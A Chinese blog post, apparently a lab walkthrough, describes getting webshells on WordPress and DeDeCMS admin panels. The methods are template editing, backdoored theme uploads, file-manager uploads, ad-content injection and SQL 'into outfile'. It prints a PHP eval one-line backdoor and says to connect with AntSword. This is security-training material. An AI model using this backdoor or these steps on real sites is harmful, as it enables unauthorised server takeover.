首页 > 其他分享 >Wordperss漏洞 DeDeCMS漏洞

Wordperss漏洞 DeDeCMS漏洞

时间:2024-12-29 16:27:28浏览次数:10  
标签:WebShell Wordperss -- 步骤 DeDeCMS 漏洞 点击 模板

Wordperss漏洞

环境搭建
#执⾏命令
cd /vulhub/wordpress/pwnscriptum
docker-compose up -d
#靶场地址
http://8.155.7.173:8080/wp-admin/

注册账号

登录

漏洞一:后台修改模板拿WebShell

步骤一:思路是修改其WP的模板写入⼀句话木马后门并访问其文件即可GetShell;登陆WP后点击 【Appearance】 -->author-bio.php

步骤二:在其模板中插入一句话木马代码..点击 【Update File】 按钮
<?php @eval($_POST[123]);?>

步骤三:访问以下连接即可获取WebShell
http://8.155.7.173:8080/wp-content/themes/twentyfifteen/author-bio.php

步骤四:尝试蚁剑连接获取webshell

漏洞二:上传主题拿WebShell
步骤⼀:接着上⼀个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP⽂件

先去下载一个免费模板

https://blog.csdn.net/m0_59768231/article/details/144777066?spm=1001.2014.3001.5502

解压后打开第一个文件夹写入一句话木马

重新压缩为一个.zip压缩包

步骤二:找到网站上传模板主题的位置

选中我们刚才重新压缩好的文件

步骤三:访问以下连接即可获取WebShell
http://8.155.7.173:8080/wp-content/themes/moban-1354265872-wordpress329-sprout-in-hands-10/1.php

步骤四:尝试蚁剑连接获取webshell

 DeDeCMS漏洞

环境搭建

傻瓜式安装

漏洞一:通过文件管理器上传WebShel
步骤⼀:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过⽂件管理器上传php文件获取webshell

登陆网站后台

步骤二:登陆到后台点击 【核心】 --》 【文件式管理器】 --》 【文件上传】 将准备好的恶意代码上传

步骤三:访问上传成功后的文件
http://127.0.0.1/dedecms/uploads/1.php

漏洞二:修改模板文件拿WebShell
步骤⼀:与WPCMS类似,直接修改模板拿WebShell..点击 【模板】 --》 【默认模板管理】 --》【index.htm】 --> 【修改】

进入后添加恶意代码

步骤二:点击 【胜成】 --》 【更新主页HTML】 --》将主页位置修改为【../index.php 】--》点击 【生成静态】 --》点击 【更新主页】 再次访问站点首页可发现变化

步骤三:访问主页,phpinfo更新成功

漏洞三:后台任意命令执行拿WebShell
步骤一:点击 【模块】 --》 【广告管理】 --》 【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】

步骤二:点击【代码】--》在图中显示的路径与站点进行拼接

http://127.0.0.1/dedecms/plus/ad_js.php?aid=1

步骤三:使用蚁剑测试连接

漏洞四:通过后台sql命令执行拿webshell
步骤一:访问系统---sql命令行工具---执行 select @@basedir,获取mysql路径,由此瑞测网站绝对路径

猜测绝对路径为E:/phpStudy/PHPTutorial/

步骤二:into outfile写入一句话木马

步骤三:使用蚁剑测试连接

标签:WebShell,Wordperss,--,步骤,DeDeCMS,漏洞,点击,模板
From: https://blog.csdn.net/m0_68706634/article/details/144791413

相关文章

  • 友数聚 CPAS审计管理系统V4 getCurserIfAllowLogin SQL注入漏洞复现
    0x01产品简介友数聚CPAS审计管理系统V4是友数聚科技有限公司(用友集团成员企业)开发的一款审计软件产品,它是CPAS审计信息系统的一个重要组成部分。中国注册会计师协会于2012年与用友集团签订战略合作协议,合力开发了CPAS审计信息系统,以服务于本土会计师事务所,建立管理集中、覆盖......
  • pikachu文件上传漏洞通关详细解析
    什么是文件上传漏洞文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后,后台会对上传的文件进行判断比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。如果说后台对上......
  • ExpDemo-JavaFX打造属于你自己的图形化漏洞利用工具
    声明!本文章所有的工具分享仅仅只是供大家学习交流为主,切勿用于非法用途,如有任何触犯法律的行为,均与本人及团队无关!!!目录标题前言编写属于你的图像化漏洞利用工具项目结构编写EXP部署部署启动启动前言这是一个构建图形化漏洞利用的一个项目,已经写好架子,只需要往里......
  • Web漏洞之CSRF和SSRF
    Web漏洞之CSRF和SSRFCSRFCSRF(CrossSiteRequestForgery,跨站请求伪造)是一种通过利用用户身份认证信息,诱导用户执行非预期请求的攻击方式。一、基础知识1.漏洞原理CSRF的核心在于黑客利用用户的身份认证信息,让用户在不知情的情况下向受信任的网站发送请求。例如,黑客......
  • 用 Ingram 和 masscan 来扫描全网存在漏洞的camera
    前言大学的时候也写过和Ingram差不多的工具,不过那时候已经玩到没有兴致了,代码已不知道哪里去。没想到在Github看到了这个工具,实现思路和我的几乎一样,互联网就是这么神奇。Ingram的Github:https://github.com/jorhelp/Ingram本着不能让服务器闲着的想法,开始吧安装Ingramgitclo......
  • 红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0
    免责声明 本系列工具仅供安全专业人员进行已授权环境使用,此工具所提供的功能只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用工具中的功能对任何计算机系统进行入侵操作。利用此工具所提供的信息而造成的直接或间接后果和损......
  • Oracle WebLogic Server反序列化漏洞(CVE-2024-21216)
    免责声明请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。一、简介WebLogic是一款由BEA系统公司开发的JavaEE应用服务器,现由Oracle......
  • 【漏洞复现】高校人力资源管理服务平台系统ReportServer存在敏感信息泄露漏洞
    免责声明请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。一、简介高校人力资源管理系统通过在线化管理实现了招聘全流程的高效操作,包括职......
  • 【Java 代码审计入门-02】SQL 漏洞原理与实际案例介绍
    SQL注入漏洞全解析发布日期:2024年12月26日引言在互联网的快速发展的今天,Web应用的安全性变得越来越重要。SQL注入(SQLInjection,简称SQLi)作为最常见的Web安全漏洞之一,给无数网站和应用程序带来了巨大的风险。本文将深入探讨SQL注入的原理、危害以及如何有效防范。什么是S......
  • 【Java 代码审计入门-03】XSS 漏洞原理与实际案例介绍
    【Java代码审计入门-03】XSS漏洞原理与实际案例介绍写在前面为什么会有这一系列的文章呢?因为我发现网上缺乏成系统的Java代码审计教程,大多是分散的点。对于新人来说,这样的资源可能不够友好。加上本人也在学习Java审计,希望通过记录和总结自己的学习历程,帮助到更多的人。因此......